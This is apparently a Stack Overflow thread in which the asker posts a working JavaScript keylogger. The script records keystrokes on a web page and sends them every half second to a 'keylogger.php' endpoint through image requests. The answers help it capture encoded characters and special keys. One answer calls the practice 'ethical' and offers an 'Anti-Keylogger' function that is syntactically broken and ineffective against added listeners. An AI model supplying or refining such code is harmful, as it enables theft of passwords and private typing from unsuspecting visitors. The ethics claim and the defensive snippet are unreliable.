# Javascript keylogger (for ethical purpose)

Tags: javascript, html, keylogger

**JS code**
*The following is javascript code for keylogging on html page.*

```
var keys = '';
document.onkeypress = function(e) {
  get = window.event ? event : e;
  key = get.keyCode ? get.keyCode : get.charCode;
  key = String.fromCharCode(key);
  keys += key;
}
window.setInterval(function() {
  if (keys != '') {
    new Image().src = 'keylogger.php?c=' + keys;
    keys = '';
  }
}, 500);
```

It does work but some special keys are not getting logged for example space,tab,backspace etc.

How can I customize the above code to log all special keys?

Comment: Likely due to URL encoding.

Comment: What is the reason for downvoting?

Comment: `fromCharCode` isn't going to work with values live `Alt` from `KeyboardEvent.keyCode`.

Comment: @DávidMolnár I'm going to guess ethical. Although I can't really say for sure - some posts get downvoted seemingly because OP didn't know every single intricate detail of how SO posting works. Regardless if they are a new user or not. One new user asker got scolded by a very high rep member for not formatting the code correctly...when it would have taken 5 seconds to click Edit, hightlight the code and click the `{}` button which would have "formatted" it. So, some tend to be really petty and intolerant, regardless of the topic of the question.

Answer (score 4):

URLs can contain only a specific set of characters. This is the reason you need to encode the characters you want to send. Use the [`encodeURIComponent`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/encodeURIComponent) function on `keys`:

```
new Image().src = 'keylogger.php?c='+encodeURIComponent(keys);
```

Comment: Now it's working but tab and backspace key are still not working.

Comment: What is the output if you `console.log` out `encodeURIComponent(keys)` with a space/tab in `keys`?

Comment: There's no output of tab and backspace keys but space does produce %20 on chromium console log while on Firefox ESR space is same as in chromium but backspace and tab keys dump %08 and %09 respectively.

Comment: I am not sure if I understand this correctly. Is this a problem with Chrome? Could be the problem on the server side with the PHP script?

Answer (score 1):

Actually with `document.onkeypress` will not be able to capture `Tab` & `Backspace` you need to use `document.onkeydown` as

```js
document.onkeydown = function(e){ 
    console.log(e);
};
```

If you that you will be able to log that in console
[image]

---

Finally you can update your keylogger as:

```js
//keylogger
var keycodes = "";
var keychars = "";
document.onkeydown = function(e){ 
    keycodes += `${e.code}, `;
    keychars += `${e.key}`;
    
    if(e.code === "Enter") // when Enter is pressed print the line in console
    { 
        console.log(keycodes); //print code
        console.log(keychars); //print char
        keycodes = ""; //make null
        keychars = ""; // make null 
    } 
};
```

And Relax this is all ethical as `javascript` provides `api` to intercept `keypress`.

---

To overcome this we can have something as **Anti-Keylogger** and call it when the page is loaded

```js
//Disables the keystroke logging 
function AntiKeylogger(){
    window.onkeydown = undefined;
    window.onkeypress = undefined;
    window.onkeyup = undefined;
    document.onkeydown = undefined;
    document.onkeypress = undefined;
    document.onkeyup = undefined;
}();
```